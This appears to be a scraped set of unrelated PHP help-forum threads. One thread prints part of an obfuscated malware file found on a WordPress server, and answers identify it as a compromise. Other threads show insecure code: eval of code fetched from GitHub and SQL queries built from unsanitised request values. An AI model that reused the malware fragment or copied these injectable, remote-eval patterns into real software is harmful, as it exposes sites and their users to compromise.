I don't know what happened, but barcode39.php class is just not working anymore. If You follow the link http://eventstar.hu/api/code39/BARCODE-123456789101 , You can see that there's a broken image link, however, the image was generated directly to the browser by the PHP class with the correct headers (image/gif). If you view the source (type "view-source:" before the URL in Chrome), You can see that the image data was here, starting wih GIF...
The code was not too complex. page_attr[1] is the end of the URL, in this case : BARCODE-123456789101. The following snippet was wrapped inside if($page_attr[0]=="code39"), but it's irrelevant, because it's true.
include("include/barcode39/barcode39.class.php");
$bc = new Barcode39($page_attr[1]);
$bc->barcode_text_size = 2;
$bc->barcode_bar_thick = 2;
$bc->barcode_bar_thin = 1;
$bc->barcode_use_dynamic_width = false;
$bc->barcode_width = 300;
$bc->barcode_padding = 7;
$bc->draw();
exit;
Can a PHP update cause the problem? Or something is wrong with my code? I don't touch these files weeks ago, hovewer the barcode generator doesn't work anymore... Any suggestions?
Finally, someone pointed out that the encoding of the PHP file itself can cause problems. So everyone facing this problem, make sure You saved the file in UTF-8 without BOM!
Related
For ajax purpose, I'm trying to render a string from a Cakephp (2.8.5) controller without any view. To achieve this, I usually code, then use $this->render = false before the return and it works fine.
I uploaded the website on OVH (a french Internet Service Provider) and something's wrong, the rendered string doesn't behave as it should. It's not displayed as intended until it reaches a certain size.
To demonstrate the issue, i prepared a dynamic page online (you can change the 15 by any number, below 15 generates the issue) :
http://darxnake.fr/nadau3/pages/test/15
code is very simple :
PagesController.php :
class PagesController extends AppController {
public function test($nb=1) {
$str = "";
$char = "o";
$upper = true;
for ($i=0; $i < $nb; $i++) {
$str .= $upper ? strtoupper($char) : strtolower($char);
$upper = $upper ? false : true;
}
$this->autoRender = false;
return $str;
}
}
Changing the last return by a die displays the full string, but I don't like die in controllers, doesn't feel like it's how it should be done.
This code works offline on my computer (Windows / uWamp) and I can't understand what's wrong. I suspect something from OVH, but can't be sure and don't know where to look. Here is the phpinfo for this host : http://darxnake.fr/nadau3/pages/info/
Can you please help me find out what's going on ? Thank you.
Edit :
Finaly did find what's causing the issue. Cakephp2 sends an HTTP Header called Content-Length with every response. While the passed size is accurate (14 passed to header for 14 characters asked in the code), rendered string is stripped. If I disable this header in CakePhp lib (/lib/Cake/Network/CakeResponse.php), render string is fixed.
On my local pc, this header is not sent (don't know why) and on OVH with the very same test but with CakePhp 3, this header is not sent either.
So I disabled it the lib code and problem is gone, though if someone could please explain what happens, and if I did something wrong disabling it. I'm not very familiar with HTTP headers...
I don't know exactly why but after using;
$this->autoRender = false;
You can't get actual result exactly..I have faced that situation too.
In my case I removed autoRender and worked fine.
Try removing that line if not compulsory.
Sorry if this is the wrong site to post on.
Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:
<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3##G9CJJ");
${YkT1GO68Y3rXB(",g0##&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh\"Co[")} = lpkBre6("*77#0>A-DE6#6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");
I have never seen code like this before. Can anyone tell me what it is exactly doing?
This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.
You should remove this code and update all your plugins.
Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.
If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.
Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from Wordpress.org.
I'm trying to get a page from github to be read and executed with PHP upon page load due to it updating often, although while I've managed to format the page to what should be correct, it still doesn't seem to work.
Basically, I've used the file_get_contents to grab all of the information on the page (if I get this working it should potentially work with any page), removed all comments, and now I just need the code to run.
I've heard eval is unsafe, but it's only a personal website and I trust the github page isn't going to use malicious code, but I'm getting a "syntax error, unexpected T_CONSTANT_ENCAPSED_STRING", when the page runs, despite the fact I haven't touched the code and it runs fine if copied and pasted.
Here is the code I've used to remove the comments, I can't see any problem on or around line 391 where it says the error is, http://www.compileonline.com/execute_php_online.php works if you copy and paste it in
#get page data, remove intro comment (unefficient but can be rewritten once working)
$browsercoderaw = explode("*/",file_get_contents("https://raw.githubusercontent.com/cbschuld/Browser.php/master/lib/Browser.php"));
for($i==1;$i<count($browsercoderaw);$i++){
if($i>1){$browsercodejoined.=" */";} # replace */ for other comments so they can be removed later
$browsercodejoined.=$browsercoderaw[$i];}
$browsercode = nl2br(str_replace("?>","",$browsercodejoined));
#remove all /* comments
$commentremove = explode("/*",$browsercode);
$browsercode2 = $commentremove[0];
for($j==1;$j<count($commentremove);$j++){
$commentsplit = explode("*/",$commentremove[$j]);
$browsercode2.=$commentsplit[1];
}
#remove all // comments
$commentremove2 = explode("<br />",$browsercode2);
$browsercode3 = $commentremove2[0];
$linenum = 0;
for($k==1;$k<count($commentremove2);$k++){
$commentsplit = explode("//",$commentremove2[$k]);
if(strlen(trim($commentsplit[0]))>0){
$browsercode3.=$commentsplit[0];
$browsercodereadable.=$linenum.". ".$commentsplit[0]."<br>";
$linenum++;
}
}
echo $browsercodereadable;
eval($browsercode3);
?>
Also, if there is a better way of doing this please say so, I tried include but the webhost doesn't allow fetching urls from other domains. To be fair, I'm not entirely sure if it's the correct use of eval, but it sounds like it should potentially work.
I'm trying to deal with Excel sheets in PHP and the following code causes irritating problems.
$getOrderFile = $this->db->query("SELECT order_file FROM orders WHERE id='".$order."'")->fetch_assoc();
$excelReader = PHPExcel_IOFactory::createReaderForFile('xls/'.$getOrderFile["order_file"]);
$excelReader->setReadDataOnly(true);
$Excel = $excelReader->load('xls/'.$getOrderFile["order_file"]);
return $Excel->setActiveSheetIndex(0)->getHighestRow();
Now, I checked the script with two variants of $getOrderFile["order_file"]:
1. excel1.xlxs
2. excel1.xls
When $getOrderFile["order_file"] equals excel1.xlxs - the page goes completely blank. There's no content displayed. And should there be any additional text in HTML - it isn't displayed. As if there was "exit;" somewhere but isn't.
When $getOrderFile["order_file"] equals excel1.xls - the pages goes "missing". I get "The webpage is not accessible" (404).
Can somebody tell me what is wrong? I just want to get the rowcount and... well. The whole system goes nuts.
Thanks for your help!
I am working on a school-project with two classmates. Our task is to make a dynamic gallery for web.
So we got the whole gallery up and running perfect, except chrome is acting mighty weird about it.
We have our pictures uploaded in blob, as well as our thumbnails. We load them from the database through php.
<div id="content_right">
<?php
if(isset($_GET['c'])) {
$c = $_GET['c'];
$thumbs_sql = mysql_query("SELECT foto_id
FROM `fotos`
INNER JOIN foto_cat ON fotos.foto_cat = foto_cat.cat_id
WHERE fotos.foto_cat = $c");
}
else{
$thumbs_sql = mysql_query("SELECT foto_id
FROM fotos
INNER JOIN foto_cat ON fotos.foto_cat = foto_cat.cat_id
ORDER BY RAND() LIMIT 8");
}
while($getthumbs = mysql_fetch_array($thumbs_sql))
{
$thumb_id = $getthumbs["foto_id"];
$picsource = 'inc/thumbnails.php?thumb='.$thumb_id;
$thumb .= '<div class="ikon">
<img alt="'.$thumb_id.'" src="'.$picsource.'" value="inc/picture.php?pic='.$thumb_id.'" />
</div>';
}
echo $thumb;
?>
</div>
The thing is, it works perfect in any browser but chrome. The problem is the browser (or server) seems to add a very odd entity in our file-source (for the img-tag). It cannot be displayed in the page source, neither by echoing the source out. It is only visible through chromes developer tools, and shows up as a square (unknown entity?). It is placed right after "inc/".
(picture-example of the problem in chrome developer tools.)
Not only does this seem strange, but also, it works perfect in chrome when we use a localhost (wamp/mamp/xampp etc.). Likewise, the image can still be downloaded/viewed if hardcoded into either url bar or source.
We have tried converting it to string, adding the slash through php, setting enctype and anything else we could possibly think of.
This leads us to believe it must be a serverside problem? Are we mistaken?
And if not, is there a workaround through coding?
The gallery is live at http://46246.rtsphp.dk/gallery/index.php.
Let me know if you need more files than this somehow, or anything else. Any help would be greatly appreciated, since we ourselves are clueless :S
~Esben Tind (esbentind at gmail dot com)
This is a serverside issue. Your thumbnails.php script is sending the following header:
Content-Disposition: attachment; filename=nytaar1.jpg
This makes the browser try to download the file. I'd suggest searching for that in thumbnails.php and removing it.
You need to HTML-encode all values you use in HTML, using the htmlspecialchars() function, like so:
<img alt="'.htmlspecialchars($thumb_id).'" src="'.htmlspecialchars($picsource).'" value="inc/picture.php?pic='.htmlspecialchars($thumb_id).'" />
Otherwise, if any of the values by any chance contains & characters or similar, you produce invalid HTML, and the output is undefined - some browsers may guess correctly what you meant, others will mis-guess or simply refuse to render your HTML.